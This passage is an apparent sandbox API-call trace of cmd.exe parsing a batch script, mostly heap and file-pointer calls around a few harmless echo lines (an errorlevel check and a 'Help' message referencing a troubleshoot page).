BaseAddress=0x19a8f1ea870) returned 1 [0175.197] GetProcessHeap () returned 0x19a8f1e0000 [0175.197] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea770) returned 1 [0175.197] GetProcessHeap () returned 0x19a8f1e0000 [0175.197] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea720) returned 1 [0175.197] GetProcessHeap () returned 0x19a8f1e0000 [0175.197] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0a30) returned 1 [0175.197] GetProcessHeap () returned 0x19a8f1e0000 [0175.197] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea500) returned 1 [0175.197] GetProcessHeap () returned 0x19a8f1e0000 [0175.198] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb920) returned 1 [0175.198] GetProcessHeap () returned 0x19a8f1e0000 [0175.198] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e6010) returned 1 [0175.198] GetProcessHeap () returned 0x19a8f1e0000 [0175.198] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5f10) returned 1 [0175.198] GetProcessHeap () returned 0x19a8f1e0000 [0175.198] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5e10) returned 1 [0175.198] GetProcessHeap () returned 0x19a8f1e0000 [0175.199] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea4b0) returned 1 [0175.199] GetProcessHeap () returned 0x19a8f1e0000 [0175.199] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0175.199] GetProcessHeap () returned 0x19a8f1e0000 [0175.200] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f92c0) returned 1 [0175.200] GetProcessHeap () returned 0x19a8f1e0000 [0175.200] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0cf0) returned 1 [0175.200] GetProcessHeap () returned 0x19a8f1e0000 [0175.200] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb9e0) returned 1 [0175.200] GetProcessHeap () returned 0x19a8f1e0000 [0175.201] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee490) returned 1 [0175.201] GetProcessHeap () returned 0x19a8f1e0000 [0175.201] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee0d0) returned 1 [0175.201] GetProcessHeap () returned 0x19a8f1e0000 [0175.202] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0d30) returned 1 [0175.202] GetProcessHeap () returned 0x19a8f1e0000 [0175.202] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5950) returned 1 [0175.202] GetProcessHeap () returned 0x19a8f1e0000 [0175.202] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee550) returned 1 [0175.203] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.203] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x907 [0175.203] ReadFile (in: hFile=0x94, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.203] SetFilePointer (in: hFile=0x94, lDistanceToMove=2336, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x920 [0175.203] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %errorlevel% NEQ 0 (\r\n", cbMultiByte=25, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="if %errorlevel% NEQ 0 (\r\nRUNNING\"\r\ng, it's important for the batch script\r\n===============================================================\r\n") returned 25 [0175.203] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.203] GetFileType (hFile=0x94) returned 0x1 [0175.203] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.204] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x920 [0175.204] GetProcessHeap () returned 0x19a8f1e0000 [0175.204] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0175.204] GetProcessHeap () returned 0x19a8f1e0000 [0175.204] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f1fe1c0 [0175.204] GetProcessHeap () returned 0x19a8f1e0000 [0175.205] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x26) returned 0x19a8f1eb9e0 [0175.205] GetEnvironmentVariableW (in: lpName="errorlevel", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0175.205] _wcsicmp (_String1="errorlevel", _String2="CD") returned 2 [0175.205] _wcsicmp (_String1="errorlevel", _String2="ERRORLEVEL") returned 0 [0175.205] _vsnwprintf (in: _Buffer=0x7ff7bd7296a0, _BufferCount=0x1fff, _Format="%d", _ArgList=0x43f9efeca8 | out: _Buffer="0") returned 1 [0175.206] GetProcessHeap () returned 0x19a8f1e0000 [0175.206] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb9e0) returned 1 [0175.206] GetProcessHeap () returned 0x19a8f1e0000 [0175.206] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fe1c0) returned 1 [0175.206] GetProcessHeap () returned 0x19a8f1e0000 [0175.207] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0175.207] _wcsicmp (_String1="if", _String2=")") returned 64 [0175.207] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0175.207] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0175.207] _wcsicmp (_String1="IF", _String2="if") returned 0 [0175.207] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0175.207] GetProcessHeap () returned 0x19a8f1e0000 [0175.207] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee6d0 [0175.207] GetProcessHeap () returned 0x19a8f1e0000 [0175.208] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1e5950 [0175.208] GetProcessHeap () returned 0x19a8f1e0000 [0175.208] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecb80 [0175.208] GetProcessHeap () returned 0x19a8f1e0000 [0175.208] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ecb80, Size=0x16) returned 0x19a8f1ec800 [0175.208] GetProcessHeap () returned 0x19a8f1e0000 [0175.208] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ec800) returned 0x16 [0175.208] _wcsicmp (_String1="0", _String2="/I") returned 1 [0175.208] GetProcessHeap () returned 0x19a8f1e0000 [0175.208] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee250 [0175.208] GetProcessHeap () returned 0x19a8f1e0000 [0175.208] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ec720 [0175.208] _wcsicmp (_String1="ERRORLEVEL", _String2="0") returned 53 [0175.208] _wcsicmp (_String1="EXIST", _String2="0") returned 53 [0175.208] _wcsicmp (_String1="CMDEXTVERSION", _String2="0") returned 51 [0175.208] _wcsicmp (_String1="DEFINED", _String2="0") returned 52 [0175.209] _wcsicmp (_String1="NOT", _String2="0") returned 62 [0175.209] GetProcessHeap () returned 0x19a8f1e0000 [0175.209] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ecaa0 [0175.209] _wcsicmp (_String1="NEQ", _String2="EQU") returned 9 [0175.209] _wcsicmp (_String1="NEQ", _String2="NEQ") returned 0 [0175.209] GetProcessHeap () returned 0x19a8f1e0000 [0175.209] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ecb40 [0175.209] GetProcessHeap () returned 0x19a8f1e0000 [0175.209] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee9d0 [0175.209] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.209] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x920 [0175.210] ReadFile (in: hFile=0x94, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efebc0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efebc0*=0x1fff, lpOverlapped=0x0) returned 1 [0175.210] SetFilePointer (in: hFile=0x94, lDistanceToMove=2343, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x927 [0175.210] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo:\r\norlevel% NEQ 0 (\r\nRUNNING\"\r\ng, it's important for the batch script\r\n===============================================================\r\n") returned 7 [0175.210] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.210] GetFileType (hFile=0x94) returned 0x1 [0175.210] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.210] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x927 [0175.210] GetProcessHeap () returned 0x19a8f1e0000 [0175.210] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0175.210] GetProcessHeap () returned 0x19a8f1e0000 [0175.211] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0175.211] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0175.211] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0175.211] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0175.211] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0175.212] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0175.212] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0175.212] GetProcessHeap () returned 0x19a8f1e0000 [0175.212] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee310 [0175.212] GetProcessHeap () returned 0x19a8f1e0000 [0175.212] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb980 [0175.212] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.212] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x927 [0175.213] ReadFile (in: hFile=0x94, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efeb60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efeb60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.213] SetFilePointer (in: hFile=0x94, lDistanceToMove=2398, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95e [0175.213] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo Null service is not running, script may crash...\r\n", cbMultiByte=55, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo Null service is not running, script may crash...\r\nr the batch script\r\n===============================================================\r\n") returned 55 [0175.213] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.213] GetFileType (hFile=0x94) returned 0x1 [0175.213] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.213] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95e [0175.214] GetProcessHeap () returned 0x19a8f1e0000 [0175.214] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0175.214] GetProcessHeap () returned 0x19a8f1e0000 [0175.214] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0175.215] GetProcessHeap () returned 0x19a8f1e0000 [0175.215] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edb90 [0175.215] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0175.215] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0175.215] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0175.215] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0175.215] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0175.215] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0175.215] GetProcessHeap () returned 0x19a8f1e0000 [0175.216] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee3d0 [0175.216] GetProcessHeap () returned 0x19a8f1e0000 [0175.216] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb8f0 [0175.216] GetProcessHeap () returned 0x19a8f1e0000 [0175.216] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x74) returned 0x19a8f1eaed0 [0175.216] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.216] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95e [0175.217] ReadFile (in: hFile=0x94, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efeb30, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efeb30*=0x1fff, lpOverlapped=0x0) returned 1 [0175.217] SetFilePointer (in: hFile=0x94, lDistanceToMove=2405, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x965 [0175.217] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo:\r\nll service is not running, script may crash...\r\nr the batch script\r\n===============================================================\r\n") returned 7 [0175.217] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.217] GetFileType (hFile=0x94) returned 0x1 [0175.217] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.217] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x965 [0175.217] GetProcessHeap () returned 0x19a8f1e0000 [0175.218] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0175.218] GetProcessHeap () returned 0x19a8f1e0000 [0175.218] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0175.218] GetProcessHeap () returned 0x19a8f1e0000 [0175.218] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee490 [0175.218] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0175.219] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0175.219] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0175.219] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0175.219] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0175.219] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0175.219] GetProcessHeap () returned 0x19a8f1e0000 [0175.224] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee550 [0175.224] GetProcessHeap () returned 0x19a8f1e0000 [0175.224] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb6b0 [0175.224] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.224] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x965 [0175.224] ReadFile (in: hFile=0x94, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efeb00, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efeb00*=0x1fff, lpOverlapped=0x0) returned 1 [0175.224] SetFilePointer (in: hFile=0x94, lDistanceToMove=2412, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x96c [0175.224] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo:\r\nll service is not running, script may crash...\r\nr the batch script\r\n===============================================================\r\n") returned 7 [0175.225] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.225] GetFileType (hFile=0x94) returned 0x1 [0175.225] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.225] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x96c [0175.225] GetProcessHeap () returned 0x19a8f1e0000 [0175.225] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0175.225] GetProcessHeap () returned 0x19a8f1e0000 [0175.225] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0175.226] GetProcessHeap () returned 0x19a8f1e0000 [0175.226] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee610 [0175.226] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0175.226] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0175.226] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0175.226] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0175.226] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0175.226] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0175.226] GetProcessHeap () returned 0x19a8f1e0000 [0175.226] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee010 [0175.226] GetProcessHeap () returned 0x19a8f1e0000 [0175.226] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb7a0 [0175.226] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.226] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x96c [0175.226] ReadFile (in: hFile=0x94, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efead0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efead0*=0x1fff, lpOverlapped=0x0) returned 1 [0175.226] SetFilePointer (in: hFile=0x94, lDistanceToMove=2448, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x990 [0175.226] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo Help - %mas%troubleshoot.html\r\n", cbMultiByte=36, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo Help - %mas%troubleshoot.html\r\nript may crash...\r\nr the batch script\r\n===============================================================\r\n") returned 36 [0175.226] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.226] GetFileType (hFile=0x94) returned 0x1 [0175.226] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.226] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x990 [0175.226] GetProcessHeap () returned 0x19a8f1e0000 [0175.226] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0175.227] GetProcessHeap () returned 0x19a8f1e0000 [0175.227] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f1fe1c0 [0175.227] GetProcessHeap () returned 0x19a8f1e0000 [0175.227] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec660 [0175.227] GetEnvironmentVariableW (in: lpName="mas", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x16 [0175.227] GetProcessHeap () returned 0x19a8f1e0000 [0175.227] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec660) returned 1 [0175.227] GetProcessHeap () returned 0x19a8f1e0000 [0175.227] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fe1c0) returned 1 [0175.227] GetProcessHeap () returned 0x19a8f1e0000 [0175.228] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0175.228] GetProcessHeap () returned 0x19a8f1e0000 [0175.228] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee190 [0175.228] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0175.228] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0175.228] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0175.228] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0175.228] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0175.229] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0175.229] GetProcessHeap () returned 0x19a8f1e0000 [0175.229] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edc50 [0175.229] GetProcessHeap () returned 0x19a8f1e0000 [0175.229] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb920 [0175.229] GetProcessHeap () returned 0x19a8f1e0000 [0175.229] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x70) returned 0x19a8f1eaf50 [0175.229] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.229] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x990 [0175.229] ReadFile (in: hFile=0x94, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efeaa0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efeaa0*=0x1fff, lpOverlapped=0x0) returned 1 [0175.229] SetFilePointer (in: hFile=0x94, lDistanceToMove=2455, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x997 [0175.229] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo:\r\nlp - %mas%troubleshoot.html\r\nript may crash...\r\nr the batch script\r\n===============================================================\r\n") returned 7 [0175.229] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.229] GetFileType (hFile=0x94) returned 0x1 [0175.229] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.229] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x997 [0175.229] GetProcessHeap () returned 0x19a8f1e0000 [0175.229] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0175.229] GetProcessHeap () returned 0x19a8f1e0000 [0175.230] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0175.230] GetProcessHeap () returned 0x19a8f1e0000 [0175.230] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edf50 [0175.230] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0175.230] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0175.230] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0175.230] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0175.230] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0175.230] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0175.230] GetProcessHeap () returned 0x19a8f1e0000 [0175.230] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee790 [0175.230] GetProcessHeap () returned 0x19a8f1e0000 [0175.230] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb9e0 [0175.231] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.231] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x997 [0175.231] ReadFile (in: hFile=0x94, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efea70, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efea70*=0x1fff, lpOverlapped=0x0) returned 1 [0175.231] SetFilePointer (in: hFile=0x94, lDistanceToMove=2462, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x99e [0175.231] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo:\r\nlp - %mas%troubleshoot.html\r\nript may crash...\r\nr the batch script\r\n===============================================================\r\n") returned 7 [0175.231] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.231] GetFileType (hFile=0x94) returned 0x1 [0175.231] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.231] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x99e [0175.231] GetProcessHeap () returned 0x19a8f1e0000 [0175.231] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0175.231] GetProcessHeap () returned 0x19a8f1e0000 [0175.232] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0175.232] GetProcessHeap () returned 0x19a8f1e0000 [0175.232] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee850 [0175.232] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0175.232] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0175.232] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0175.232] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0175.232] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0175.232] 